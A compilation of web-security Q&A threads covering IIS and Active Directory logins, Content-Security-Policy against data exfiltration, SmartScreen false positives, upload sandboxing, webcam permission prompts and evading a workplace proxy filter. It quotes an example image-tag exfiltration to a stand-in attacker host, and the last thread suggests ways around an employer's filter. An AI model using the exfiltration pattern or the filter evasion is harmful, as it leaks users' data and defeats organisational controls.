Techniques for securing a pure HTML site

I have been tasked with securing a pure HTML website for someone, and I'm not entirely sure how to approach the problem. Here are the constraints:
All logins must link in with our current Active Directory domain.
(Optional, but desired) The solution must whitelist requests coming from inside our intranet - that is, if someone attempts to access the site from on campus, they are immediately allowed in.
(Optional, but desired) The solution must whitelist requests made from our hub website, regardless of whether or not they are on campus. Said hub site is secured with logins that reference our Active Directory domain, so this is essentially a request for a passthrough.
The vast majority of our user base is very non-technical, so as small a footprint as possible, with as few login prompts as possible, is necessary.
Normally, I'd have no problem with this, but this is a pure HTML website so my options are a little limited. My current ideas:
Use IIS6's Directory Security to simply force Active Directory authentication. I cannot use the IP permit/deny restrictions for the intranet whitelist because that check comes before anything else in the request life cycle and anything it denies is rejected outright - it can't fall through to asking off-campus users to authenticate instead. I cannot change this behavior.
Code an aspx file that resides on our hub website that pre-loads the integrated Windows security credentials for the user, automatically authenticating them to the HTML website. As far as IIS is concerned, however, these are two different websites, and this sounds like bad practice at best and an imitation of a cross-site intrusion attempt at worst.
I have to admit I'm stuck. Has anyone ever handled a problem like this before?

Assuming you are using Windows 2003/IIS6 and your web server is part of your domain, you can do the following:
Configure your website to use Integrated and/or Basic authentication to authenticate against Active Directory, and disable anonymous access. You'll find these settings by clicking "Edit" in the "Directory Security" tab of your website in IIS Manager. You'll only need to enable Basic if your users will use a browser other than Internet Explorer; if you use Basic, you should also use SSL to protect your usernames and passwords. The level of access is determined by the permissions set on the files and directories under your website's root. Any files within these directories will only be served to authenticated users.
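If you'd rather script it than click through IIS Manager, the same switches live in the metabase AuthFlags property. A sketch, assuming the default website (site ID 1; adjust the metabase path for your site):

    REM 6 = AuthBasic (2) + AuthNTLM (4); leaving the anonymous bit (1) off disables anonymous access
    cscript %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs set W3SVC/1/ROOT/AuthFlags 6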
To allow users on your domain to log on without a prompt, you will need to configure Internet Explorer to automatically log on to sites within your intranet zone. You'll also need to enable Integrated authentication for your website in IIS.
I'm not sure your third requirement (the hub passthrough) will be met. If your hub website uses impersonation it might pass your Windows credentials on to another server within your domain, but I suspect not.
References:
"How to configure IIS Web site authentication in Windows Server 2003"
http://support.microsoft.com/kb/324274/
"Internet Explorer May Prompt You for a Password"
http://support.microsoft.com/kb/258063
"How to use security zones in Internet Explorer"
http://support.microsoft.com/kb/174360/EN-US/

If the pure-HTML site is running on IIS, converting it to a .NET web app so you can wrap its resources in your custom conditional forms login, using the richer ASP.NET security model, seems like a natural enough fit. You can serve the pure HTML files out of that now-application.
This has no downside for the content maintainers that I can see.
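As a rough sketch of what that wrapper could look like (Login.aspx is a hypothetical login page; note that on IIS6 you'd also need a wildcard mapping to aspnet_isapi.dll so that .html requests actually pass through ASP.NET):

    <!-- web.config: deny anonymous users, redirect them to a forms login -->
    <configuration>
      <system.web>
        <authentication mode="Forms">
          <forms loginUrl="Login.aspx" timeout="30" />
        </authentication>
        <authorization>
          <deny users="?" /> <!-- "?" = all anonymous users -->
        </authorization>
      </system.web>
    </configuration>

The login page itself could then validate credentials against Active Directory (e.g. via the ActiveDirectoryMembershipProvider) to satisfy the domain-login requirement.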


How to prevent HTML in file:/// from accessing the internet?

The background scenario is that I want to give my users a JavaScript file which they can use to analyze their sensitive private data, and I want them to feel safe that this data will not be sent over the internet.
Initially, I thought I'd just distribute it as an .html file with an embedded <script>, and that they'd just run this .html file in the browser over the file:/// protocol, which gives some nice same-origin policy defaults.
But this won't really offer much security to my users: a script could easily create an <img src="https://evil.com?sensitive-data=${XYZ}"> tag, which would send a GET request to evil.com despite evil.com being a different origin, because by design the embedding of images from different origins is allowed.
Is there some practical way in which I could distribute my javascript and/or for the end user to run such script, so they could be reasonably sure it can't send the data over the internet?
(Unplugging the machine from the internet, installing a VM, or manipulating firewall settings are not practical.)
("Reasonably sure" = assuming that the software they use, such as the browser, follows the spec and wasn't hacked.)
Please take a look at the Content-Security-Policy subject.
https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/img-src
Supplementing your HTML with <meta http-equiv="Content-Security-Policy" content="img-src 'self';"> should disallow the browser from making image requests to foreign resources.
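As a sketch, a self-contained analyzer page could lock itself down further with default-src 'none' (which covers images, fetch/XHR, frames, fonts, and so on) and only re-allow its own inline script; evil.example is a placeholder here:

    <!DOCTYPE html>
    <html>
    <head>
      <meta charset="utf-8">
      <meta http-equiv="Content-Security-Policy"
            content="default-src 'none'; script-src 'unsafe-inline'; style-src 'unsafe-inline'">
    </head>
    <body>
      <script>
        // an exfiltration attempt like the one described above is now refused by the browser
        var img = new Image();
        img.onerror = function () { console.log("blocked by CSP"); };
        img.src = "https://evil.example/?sensitive-data=XYZ";
      </script>
    </body>
    </html>

Note that a meta-delivered CSP can't express everything a header can, and things like plain link navigation can still leak data, so this reduces rather than eliminates the exfiltration surface.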
The alternative approach could be developing your project in the form of a browser extension, where you can set up the content security policy quite precisely, including rules for inline scripting, executing string-to-JS methods (eval), frame and font origins, and so on ( https://developer.chrome.com/docs/apps/contentSecurityPolicy/ ).
As a bonus, you (and your users) get a free-of-charge code review from the browser vendors' security teams.
Setting the browser's proxy, in its settings, to localhost:DUMMY_PORT looks like a safe solution for this case.
Deno is, to cite its website:
Deno is a simple, modern and secure runtime for JavaScript and TypeScript that uses V8 and is built in Rust.
Secure by default. No file, network, or environment access, unless explicitly enabled.
So this reduces the user's trust requirement to trust in Deno (and in Chocolatey, if they want to use choco install deno to install Deno).
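A minimal sketch of what that workflow could look like (file names are placeholders; the exact error name varies by Deno version):

    // analyze.ts -- run with: deno run --allow-read=data.csv analyze.ts
    const text = await Deno.readTextFile("data.csv"); // permitted by --allow-read=data.csv

    try {
      // no --allow-net was granted, so the runtime refuses this outright
      await fetch("https://evil.example/?d=" + encodeURIComponent(text));
    } catch (err) {
      console.log("network blocked:", (err as Error).name); // PermissionDenied / NotCapable
    }

    console.log("analyzed", text.length, "characters locally");

(Newer Deno versions prompt interactively for missing permissions; add --no-prompt to turn those prompts into hard failures.)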

My site flagged as unsafe by Smartscreen only in Microsoft Edge

My Magento 1.9 webshop is marked as unsafe (phishing, which is not true) in Microsoft Edge; if I switch to IE and run the SmartScreen security check, it says all is safe.
Strangely, it happens only on one of my computers, so it didn't bother me much at first, but a customer also complained about it today.
Has anyone experienced this before and found a solution? Is there a way to check why a site is marked as unsafe by SmartScreen?
Based on my search results, the information below may be helpful to you.
Q. If I am a website owner, how do I correct a warning on my legitimate site?
A. You can immediately submit a request for a correction. Windows Defender SmartScreen has a built-in, web-based feedback system in place to help customers and website owners report any potential false warnings as quickly as possible. In Windows Internet Explorer, from a red warning, click More information then Report that this site contains no threats. This will take you to a feedback page where you can indicate you are a site owner or representative. Follow the instructions and provide the information on this site to submit a site for review...
Reference:
Resolving “This website has been reported as unsafe” (Windows Defender SmartScreen)
Q. If I am a website owner, what can I do to help minimize the chance of my website being flagged by Windows Defender SmartScreen?
A. There are several things you can do that can help minimize the chance of your site being flagged as suspicious. Think of these as best practices or optimal website design ethics.
If you ask users for personal information, use HTTPS with a valid, unexpired server certificate issued by a trusted certification authority.
Make sure that your webpage doesn't expose any cross-site scripting (XSS) vulnerabilities. Protect your site by using anti-cross-site scripting functions such as those provided by the Microsoft Anti-Cross Site Scripting library.
Use the fully-qualified domain name rather than an IP-literal address. (This means a URL should look like "microsoft.com" and not "207.46.19.30.")
Don't encode or tunnel your URLs unnecessarily. If you don't know what this means, you probably aren't doing it.
If you post external or third-party hosted content, make sure that the content is secure and from a known and trusted source.
Reference:
Windows Defender SmartScreen Frequently Asked Questions
In the MS Edge browser there's an option to "report file as safe". After clicking it, select the "I'm a website owner" option and fill in the false-positive form.

Why does MDN recommend sandboxing uploaded files on a different (sub)domain?

The Mozilla Developer Network recommends sandboxing uploaded files on a different subdomain:
Sandbox uploaded files (store them on a different server and allow access to the file only through a different subdomain or even better through a fully different domain name).
I don't understand what additional security this would provide; my approach has been to upload files to the same domain as the web page with the <input> form control, restrict uploaded files to a particular directory, perform antivirus scans on them, and then allow access to them on the same domain they were uploaded to.
There are practical/performance reasons and security reasons.
From a practical/performance standpoint, unless you are on a budget, store your files on a system optimised for performance. This can be any type of CDN if you are serving them once uploaded, or just isolated upload-only servers. You can do this yourself, or, better, use something like AWS S3 and customise the permissions to your needs.
From a security point of view, it is incredibly hard to stop an uploaded file from being executable, especially if you are using a server-side scripting language. There are many methods, both in HTTP and in the most popular HTTP servers (nginx, Apache, ...), to harden things and make them secure, but there are so many things you have to take into account, and another bunch you would never even think of, that it is much safer to keep your files somewhere else altogether, ideally somewhere with no scripting engine that could execute code in them.
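As an illustration of the header-hardening side (a sketch assuming Node with Express; /srv/uploads and the separate hostname are placeholders):

    const express = require("express");
    const app = express();

    // serve uploads from a dedicated host (e.g. usercontent.example),
    // never from the main application's domain
    app.use("/files", express.static("/srv/uploads", {
      index: false, // don't serve index files for directories
      setHeaders(res) {
        res.set("Content-Disposition", "attachment");             // download, don't render
        res.set("X-Content-Type-Options", "nosniff");             // no MIME sniffing
        res.set("Content-Security-Policy", "default-src 'none'"); // inert if rendered anyway
      },
    }));

    app.listen(8080);

Even with headers like these, the point of the MDN advice stands: if the files live on a separate (sub)domain with no scripting engine, a missed hardening step costs you far less.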
I assume that the different subdomain or domain recommendation is about XSS, vulnerabilities exploiting bad CORS configurations, and preventing phishing attempts (like someone successfully uploading content to your site that mimics your site but does something nasty, such as stealing user credentials or providing fake information, while still being served from your domain and without any HTTPS certificate warning either).

How to capture image with html5 webcam without security prompt

I need to capture an image from a web page without the security warning.
The page where I need the webcam functionality cannot be switched to the https protocol.
I've installed root certificates and made them trusted.
I tried to insert an iframe (pointed at the secure https://mysecurepage.com) inside the page (http://mypage.com), but it did not work.
#bjelli is correct - this is a major security flaw for any internet content. Just imagine if you could go to a website which would start taking photos/recording everything going on without any permissions or notifications!
However, I am working on an intranet project where disabling the prompt would be quite safe.
If you are in this sort of position, there is one thing you can do:
Google Chrome Policies
If you are deploying the browser yourself, you can override the security prompt for sites you specify. I don't know if you are working in such an environment, but this is the only way you can avoid the prompt altogether. Similar things probably apply to other browsers too.
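For Chrome specifically, the relevant policy is VideoCaptureAllowedUrls, which lets the URL patterns you list use the camera without prompting. As a sketch, on Linux a managed-policy file (e.g. /etc/opt/chrome/policies/managed/webcam.json; the intranet hostname is a placeholder) could look like:

    {
      "VideoCaptureAllowedUrls": [ "https://intranet.example.com" ]
    }

On Windows the same policy is usually pushed through Group Policy / the registry rather than a JSON file.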
As defined in http://www.w3.org/TR/mediacapture-streams/
When the getUserMedia() method is called, the user agent MUST run the following steps:
[9 steps omitted]
Prompt the user in a user agent specific manner for permission to provide the entry script's origin with a MediaStream object representing a media stream.
[...]
If the user grants permission to use local recording devices, user agents are encouraged to include a prominent indicator that the devices are "hot" (i.e. an "on-air" or "recording" indicator).
If the user denies permission, jump to the step labeled failure below. If the user never responds, this algorithm stalls on this step.
If a browser does not behave as described here it is a serious security problem. If you find a way of making a browser skip the "permission" you have found a security problem.
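For reference, this is roughly what the permission flow looks like from the page's side with the modern promise-based API (a sketch; assumes a <video autoplay> element on the page):

    async function startCamera() {
      try {
        // this call is what triggers the user-agent permission prompt
        const stream = await navigator.mediaDevices.getUserMedia({ video: true });
        document.querySelector("video").srcObject = stream;
      } catch (err) {
        // the user denied, or the page isn't a secure (https) context
        console.error("no camera access:", err.name); // e.g. "NotAllowedError"
      }
    }

There is no argument or option in that API to suppress the prompt; that decision belongs to the browser and the user.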
What do you do if you find a security problem?
Report it IMMEDIATELY! Wikipedia: Vulnerability Disclosure
Firefox: http://www.mozilla.org/security/#For_Developers
Internet Explorer: http://technet.microsoft.com/en-us/security/ff852094.aspx
Safari: https://ssl.apple.com/support/security/
Chrome: http://www.google.com/about/appsecurity/
Opera: http://www.opera.com/security/policy
This is not just a question of technical possibilities, it's also a question of professional ethics: what kind of job would I not take on? Should I be loyal to my customer, or should I think of the welfare of the public? When do I just follow orders, when do I stop bad stuff from happening, and when do I blow the whistle?
Here are some starting points for computing professionals to think about the ethics of their work:
http://www.acm.org/about/se-code
http://www.acm.org/about/code-of-ethics
http://www.ieee.org/about/corporate/governance/p7-8.html
http://www.gi.de/?id=120

Web page needed for bypassing proxy-restricted sites

I am looking for ways to browse sites that are blocked by proxy filters at my location.
One solution I came up with was to build a page that would take a URL as input and display that site in an iframe. Thus I would have a window into the blocked site on a page that my proxy allows through. I was going to host this on my personal web site and use it to access restricted content. This way I would have access to blogs and forums where there is a wealth of information that is blocked by a backwards blanket restriction list.
How can I make a web page like this? Would it be simple HTML and JavaScript, or do I need .NET?
What you aim to do has to be done server-side. When you put a page in an iframe, your web browser loads it, and will do so just as if you went directly to the URL.
There is no way around this via client-side code, such as JavaScript.
If you truly want to reinvent the wheel, pick a language and look into whatever functions it has for downloading files. No need to do this, though, when there are plenty of web-based proxy services, such as http://www.hidemyass.com.
Even if you loaded it in an iframe, the request for the page in the iframe will still go through the proxy and so you will still be blocked.
You'd have to do something like open a socket to the site through your web host, then download the content and redisplay it. That's assuming your host isn't also blocked. Also, you'll lose the benefits of cookies and sessions this way (i.e. you won't be able to be logged into things unless the session ID is in the query string).
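A minimal sketch of that fetch-and-redisplay idea (assumes Node 18+ on your host; it naively relays the body, so relative links, cookies, and sessions break exactly as described above):

    import http from "node:http";

    http.createServer(async (req, res) => {
      const target = new URL(req.url, "http://localhost").searchParams.get("url");
      if (!target) { res.writeHead(400).end("missing url parameter"); return; }
      try {
        const upstream = await fetch(target); // the request leaves from your web host
        res.writeHead(upstream.status, {
          "content-type": upstream.headers.get("content-type") ?? "text/html",
        });
        res.end(Buffer.from(await upstream.arrayBuffer()));
      } catch {
        res.writeHead(502).end("fetch failed");
      }
    }).listen(3000);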
The fastest and simplest solution would be to create a free LogMeIn account at www.logmein.com. Then set up your host computer at home, log in from work, and browse freely. I do this myself at work so no one can see my personal browsing history when I don't want them to. This of course would only work if logmein.com is not a blocked site at your work. Good luck!
It depends upon the complexity of the "filter." If you have your own website that you can reach through the proxy, or if your computer can run as a webserver, you could try accessing via a proxy script such as CGIProxy. There are online services that do this too. However, some proxy filters can detect these methods as well, and you'd still be out of luck. No JavaScript or HTML tricks can overcome the proxy filter.